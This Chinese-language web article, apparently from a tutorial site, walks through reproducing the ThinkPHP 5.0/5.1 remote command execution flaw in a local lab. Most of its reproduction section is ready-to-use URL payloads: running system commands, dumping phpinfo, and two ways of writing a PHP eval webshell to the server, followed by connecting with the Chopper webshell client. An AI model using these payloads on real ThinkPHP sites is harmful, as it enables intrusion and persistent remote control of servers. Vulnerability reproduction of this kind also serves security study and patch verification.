ThinkPHP 5.x遠程命令執(zhí)行漏洞復現(xiàn)
一、漏洞描述
2018年12月10日,ThinkPHP官方發(fā)布了安全更新,其中修復了ThinkPHP5框架的一個高危漏洞:
https://blog.thinkphp.cn/869075
漏洞的原因是由于框架對控制器名沒有進行足夠的檢測,導致在沒有開啟強制路由(默認未開啟)的情況下可能導致遠程代碼執(zhí)行,受影響的版本包括5.0和5.1。
二、漏洞影響版本
Thinkphp 5.x-Thinkphp 5.1.31
Thinkphp 5.0.x<=5.0.23
三、漏洞復現(xiàn)
1、官網(wǎng)下載Thinkphp 5.0.22,下載地址: http://www.thinkphp.cn/donate/download/id/1260.html
2、使用phpstudy搭建環(huán)境,解壓下載的Thinkphp5.0.22到網(wǎng)站目錄下,瀏覽器訪問http://192.168.10.171/thinkphp5.0.22/public
3、利用system函數(shù)遠程命令執(zhí)行
Payload如下:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
4、通過phpinfo函數(shù)查看phpinfo()的信息
Payload如下:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
5、寫入shell
Payload如下:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php
注意:需要對特殊字符使用^轉(zhuǎn)義(cmd環(huán)境下轉(zhuǎn)義方式),windows環(huán)境的echo命令輸出字符串到文檔不用引號(單引號、雙引號),部分字符url編碼不編碼都行。
6、查看是否成功寫入shell
7、菜刀連接
8、第二種的寫入shell的方法
Payload如下:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php @eval($_POST[test]);?>
9、查看是否成功寫入文件
10、菜刀連接
總結(jié)
以上所述是小編給大家介紹的ThinkPHP 5.x遠程命令執(zhí)行漏洞復現(xiàn),希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對腳本之家網(wǎng)站的支持!
如果你覺得本文對你有幫助,歡迎轉(zhuǎn)載,煩請注明出處,謝謝!
相關(guān)文章
PHP yii實現(xiàn)model添加默認值的方法(兩種方法)
這篇文章主要介紹了PHP yii實現(xiàn)model添加默認值的方法的相關(guān)資料,這里有兩種方法,和具體實現(xiàn)方法,需要的朋友可以參考下2016-11-11基于thinkPHP實現(xiàn)的微信自定義分享功能示例
這篇文章主要介紹了基于thinkPHP實現(xiàn)的微信自定義分享功能,結(jié)合實例形式分析了thinkPHP調(diào)用微信接口實現(xiàn)自定義分享功能的相關(guān)操作技巧,需要的朋友可以參考下2016-09-09Laravel 實現(xiàn)關(guān)系模型取出需要的字段
今天小編就為大家分享一篇Laravel 實現(xiàn)關(guān)系模型取出需要的字段,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧2019-10-10自定義min版smarty模板引擎MinSmarty.class.php文件及用法
這篇文章主要介紹了自定義min版smarty模板引擎MinSmarty.class.php文件及用法,可實現(xiàn)簡單的Smarty模板變量替換與輸出顯示等功能,具有一定參考借鑒價值,需要的朋友可以參考下2016-05-05